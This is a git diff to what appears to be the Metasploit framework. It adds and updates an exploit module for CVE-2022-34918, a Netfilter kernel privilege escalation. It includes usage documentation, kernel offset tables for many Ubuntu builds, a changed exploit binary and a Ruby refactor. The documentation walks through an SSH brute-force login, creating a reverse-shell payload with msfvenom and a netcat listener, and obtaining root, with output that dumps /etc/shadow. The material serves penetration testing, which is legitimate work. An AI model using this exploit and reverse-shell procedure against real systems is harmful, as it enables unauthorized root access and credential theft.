diff --git a/data/exploits/CVE-2022-34918/ubuntu.elf b/data/exploits/CVE-2022-34918/ubuntu.elf index f80983a21e..88a70b5550 100755 Binary files a/data/exploits/CVE-2022-34918/ubuntu.elf and b/data/exploits/CVE-2022-34918/ubuntu.elf differ diff --git a/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md b/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md new file mode 100644 index 0000000000..9bf2e81125 --- /dev/null +++ b/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md @@ -0,0 +1,149 @@ +## Vulnerable Application + +This module exploits a vulnerability in Netfilter, the Linux Kernel component +that implements firewall capabilities in Linux. +The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory. +The exploit relies on spraying, it may fail, or crash the target system. + +### Install + +The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`. +this module contains offsets for some vulnerable Ubuntu versions. + +Install Ubuntu 22.04 LTS with a vulnerable kernel version. +`apt-get install linux-image-5.15.0-25-generic` +Hold shift when you reboot and select the proper kernel version + +## Verification Steps + +1. Make an Ubuntu target. +1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module. +1. Get a session +1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc` +1. Do: `set session ` +1. Do: `set payload ` +1. Do: `set lhost ` +1. Do: `set [r|l]port ` +1. Do: `run` +1. You should get a new session as the `root` user. +1. If it fails, retry, or reboot Ubuntu and retry. + +## Options + +### COMPILE + +[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source +code and perform compilation on target, `False` will cause the module to upload a precompiled binary. +`Auto` will cause the module to try compiling the exploit on the target but will fall back to the +precompiled option if a compiler cannot be found. + +### WritableDir + +This indicates the location where you would like the payload and exploit binary stored. +The default value is `/tmp` + +Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if +`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file +in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at +`WritableDir`. + +## Scenarios + +### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic + +``` +msf6 > use auxiliary/scanner/ssh/ssh_login +msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40 +rhosts => 192.168.0.40 +msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane +username => redouane +msf6 auxiliary(scanner/ssh/ssh_login) > set password user +password => user +msf6 auxiliary(scanner/ssh/ssh_login) > run + +[*] 192.168.0.40:22 - Starting bruteforce +[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ' +[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200 +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc +[*] Using configured payload linux/x64/shell_reverse_tcp +msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0 +lhost => wlan0 +msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1 +session => 1 +msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run + +[!] SESSION may not be compatible with this module: +[!] * incompatible session architecture: +[*] Started reverse TCP handler on 192.168.0.32:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[*] Dropping pre-compiled binaries to system... +[*] Writing '/tmp/z9G2XJ' (761240 bytes) ... +[*] Uploading payload... +[*] Writing '/tmp/AsfKz' (248 bytes) ... +[*] Running payload on remote system... +[+] Deleted /tmp/z9G2XJ +[+] Deleted /tmp/AsfKz +[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200 + +id +[*] Payload executed! If it was successful, a session should have been created + +uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane) +``` + +## Notes + +### Included Binaries +The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from +Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`. + +The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run +when the setuid bit is detected. + +Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits +(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input. + +The following snippet shows an example of how one might run a payload to get +a new Bash shell as the `root` user. + +``` +redouane@wizardly-maxwell:~$ id +uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) +redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload +[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload +[-] No arch selected, selecting arch: x64 from the payload +No encoder specified, outputting raw payload +Payload size: 96 bytes +Final size of elf file: 216 bytes +Saved as: payload +redouane@wizardly-maxwell:~$ chmod +x payload +redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 & +[1] 2272 +redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337 + +redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload +[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected +[+] Second process currently waiting +[+] Get CAP_NET_ADMIN capability +[+] Netlink socket created +[+] Netlink socket bound +[+] Table table created +[+] Set for the leak created +[+] Set for write primitive created +[*] Leak in process +[+] Leak succeed +[+] kaslr base found 0xffffffff9f000000 +[+] physmap base found 0xffff910a00000000 +[+] modprobe path changed ! +[+] Modprobe payload setup +[?] waitpid +[?] sem_post +[+++] Got root shell, should exit? +Connection received on localhost 56962 +uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane) +root:!:19193:0:99999:7::: +daemon:*:19101:0:99999:7::: +``` diff --git a/external/source/exploits/CVE-2022-34918/Makefile b/external/source/exploits/CVE-2022-34918/Makefile index 79e2f3ecb3..ca507bde95 100644 --- a/external/source/exploits/CVE-2022-34918/Makefile +++ b/external/source/exploits/CVE-2022-34918/Makefile @@ -26,5 +26,5 @@ obj: mkdir obj clean: - rm -rf obj/*.o + rm -rf obj rm -f $(TARGET) diff --git a/external/source/exploits/CVE-2022-34918/src/util.c b/external/source/exploits/CVE-2022-34918/src/util.c index c64a998454..e1f7c1257a 100644 --- a/external/source/exploits/CVE-2022-34918/src/util.c +++ b/external/source/exploits/CVE-2022-34918/src/util.c @@ -13,9 +13,24 @@ struct kernel_info kernels[] = { // 22.04 LTS - { "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, - { "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, - { "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 }, + { "5.15.0-24-lowlatency #24-Ubuntu", 0x3e68a0, 0x3e7690, 0x1e8c320 }, + { "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 }, + { "5.15.0-27-generic #28-Ubuntu", 0x3ddaf0, 0x3de5f0, 0x1e8b320 }, + { "5.15.0-27-lowlatency #28-Ubuntu", 0x3e6970, 0x3e7760, 0x1e8c2a0 }, + { "5.15.0-30-generic #31-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 }, + { "5.15.0-30-lowlatency #31-Ubuntu", 0x3e78b0, 0x3e86a0, 0x1e8c3e0 }, + { "5.15.0-33-generic #34-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 }, + { "5.15.0-33-lowlatency #34-Ubuntu", 0x3e78c0, 0x3e86b0, 0x1e8c3e0 }, + { "5.15.0-35-generic #36-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 }, + { "5.15.0-35-lowlatency #36-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 }, + { "5.15.0-37-generic #39-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 }, + { "5.15.0-37-lowlatency #39-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 }, + { "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, + { "5.15.0-39-lowlatency #42-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 }, + { "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, + { "5.15.0-40-lowlatency #43-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 }, + { "5.15.0-41-generic #44-Ubuntu", 0x3e00a0, 0x3e0b90, 0x1e8b660 }, + { "5.15.0-41-lowlatency #44-Ubuntu", 0x3e8f70, 0x3e9d50, 0x1e8c5e0 }, // Ubuntu 20.04.4 LTS { "5.11.0-41-generic #45~20.04.1-Ubuntu", 0x37db60, 0x389a80, 0x1c6c2e0 }, { "5.11.0-44-generic #48~20.04.2-Ubuntu", 0x37de70, 0x389a90, 0x1c6c2e0 }, diff --git a/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb b/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb index 5ec057247c..1381f30764 100644 --- a/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb +++ b/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local def run_payload info = cmd_exec(@executable_path, @payload_path) info.each_line do |line| - print_status(line) + print_status(line.chomp) end print_status('Payload executed! If it was successful, a session should have been created') end @@ -106,35 +106,18 @@ class MetasploitModule < Msf::Exploit::Local def check config = kernel_config - if config.nil? - vprint_error 'Could not retrieve kernel config' - return CheckCode::Unknown - end - unless config.include? 'CONFIG_USER_NS=y' - vprint_error 'Kernel config does not include CONFIG_USER_NS' - return CheckCode::Safe - end - vprint_good 'Kernel config has CONFIG_USER_NS enabled' + return CheckCode::Unknown('Could not retrieve kernel config') if config.nil? - unless userns_enabled? - vprint_error 'Unprivileged user namespaces are not permitted' - return CheckCode::Safe - end - vprint_good 'Unprivileged user namespaces are permitted' + return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y') - if lkrg_installed? - vprint_error 'LKRG is installed' - return CheckCode::Safe - end - vprint_good 'LKRG is not installed' + return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled? + + return CheckCode::Safe('LKRG is installed') if lkrg_installed? arch = kernel_hardware - unless arch.include? 'x86_64' - vprint_error "System architecture #{arch} is not supported" - return CheckCode::Safe - end - vprint_good "System architecture #{arch} is supported" + + return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64') release = kernel_release version = "#{release} #{kernel_version.split(' ').first}"